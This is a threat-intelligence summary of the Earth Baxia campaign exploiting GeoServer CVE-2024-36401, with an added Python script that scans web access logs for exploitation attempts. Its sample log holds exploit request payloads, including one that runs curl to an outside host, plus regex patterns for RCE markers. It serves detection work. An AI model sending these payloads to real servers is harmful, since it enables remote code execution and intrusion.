Source: SOC Prime

Earth Baxia Attack Detection: China-Backed Hackers Use Spear-Phishing, Exploit the GeoServer Vulnerability (CVE-2024-36401), and Apply a New EAGLEDOOR Malware to Target APAC

  • The China-backed Earth Baxia APT group has targeted a government agency in Taiwan and, increasingly, other organizations across the APAC region.
  • State-sponsored groups from China, North Korea, Iran, and Russia continue to show sophisticated and innovative tradecraft, with Chinese state-sponsored actors at the forefront of nation-backed cyber threats.
  • Earth Baxia relies on spear-phishing and exploits CVE-2024-36401, a recently patched critical remote code execution flaw in OSGeo GeoServer (the GeoTools library it uses unsafely evaluated feature property names as XPath expressions), and then deploys a previously undocumented custom backdoor dubbed EAGLEDOOR.
  • Researchers assess that government agencies, telecommunications firms, and energy companies in the Philippines, South Korea, Vietnam, Taiwan, and Thailand are the likely primary targets.
  • A successful compromise ends with the deployment of either EAGLEDOOR or a rogue installation of the Cobalt Strike red-team framework.
  • The group hosts its malicious files on public cloud services and currently shows no clear ties to other known APT groups.
  • To detect Earth Baxia activity, SOC Prime positions its Platform for collective cyber defense and its Attack Detective SaaS solution, which provides real-time data and content audits for threat visibility and detection coverage.
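Detection content aside, a practitioner will want a concrete check for the exploitation step named above. The script below is an added example, not code from SOC Prime, Trend Micro or the GeoServer project: it scans web-server access logs for GET-based attempts to exploit CVE-2024-36401. It assumes combined log format and the publicly documented request shape of the proof of concept (an OGC/XPath function call such as `exec(java.lang.Runtime.getRuntime(), ...)` placed in a WFS `valueReference` or `propertyName` parameter, where a legitimate value is a plain attribute name like `the_geom`). The log lines are constructed for the example and use RFC 5737 documentation addresses.

```python
"""Flag GET-based attempts to exploit GeoServer CVE-2024-36401 in web access logs.

Added example, not code from SOC Prime or the GeoServer project. Assumes
combined log format and the publicly documented request shape used by the PoC.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines (combined log format, RFC 5737 addresses); not from a real incident.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Sep/2024:10:01:02 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=the_geom HTTP/1.1" 200 5120 "-" "QGIS/3.34"
203.0.113.9 - - [18/Sep/2024:10:01:09 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27id%27) HTTP/1.1" 200 812 "-" "python-requests/2.31"
198.51.100.4 - - [18/Sep/2024:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Sep/2024:10:02:31 +0000] "GET /geoserver/topp/ows?service=WFS&version=1.1.0&request=GetFeature&typeName=topp:states&propertyName=exec%28java.lang.Runtime.getRuntime%28%29%2C%27curl%20http%3A%2F%2F198.51.100.20%2Fx%27%29 HTTP/1.1" 500 0 "-" "curl/8.4"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# WFS is reachable at /geoserver/wfs, /geoserver/ows and per-workspace variants.
GEOSERVER_WFS = re.compile(r"^/geoserver(?:/[^/?]+)*/(?:wfs|ows)$", re.I)

# Parameters that name a feature property. Before the fix, GeoTools handed these
# to an XPath evaluator, so a function call here reaches code execution.
PROPERTY_PARAMS = {"valuereference", "propertyname"}

# A legitimate property reference is an attribute name or XPath step, never a call.
FUNCTION_CALL = re.compile(r"\(")
# Markers from the public PoC; any other function call is still reported at medium severity.
RCE_MARKERS = re.compile(r"java\.lang\.|getRuntime|ProcessBuilder|\bexec\s*\(", re.I)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes values, so %28 / %27 obfuscation is normalised here.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def suspicious_property_values(rec):
    """Return property/valueReference values of a GeoServer WFS request that contain a function call."""
    if not GEOSERVER_WFS.match(rec["path"]):
        return []
    return [v for k, v in rec["params"]
            if k.lower() in PROPERTY_PARAMS and FUNCTION_CALL.search(v)]


def scan(log_text):
    """Return one hit per offending property parameter found in the log text."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for payload in suspicious_property_values(rec):
            hits.append({
                "ts": rec["ts"], "ip": rec["ip"], "path": rec["path"],
                "status": rec["status"], "payload": payload,
                "severity": "high" if RCE_MARKERS.search(payload) else "medium",
            })
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"[{h['severity']}] {h['ts']} {h['ip']} {h['path']} "
              f"status={h['status']} payload={h['payload']!r}")
```

Two caveats. Access logs only show the query string, so the same payload delivered in a POSTed XML filter body is invisible to this check and needs WAF or request-body logging in front of GeoServer. And a hit with status 200 does not by itself prove execution; confirm the running GeoServer version against the patched releases in the project's advisory (2.23.6, 2.24.4 and 2.25.2) and look for the follow-on activity the report describes, such as downloads from public cloud hosting and EAGLEDOOR or Cobalt Strike beacons.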
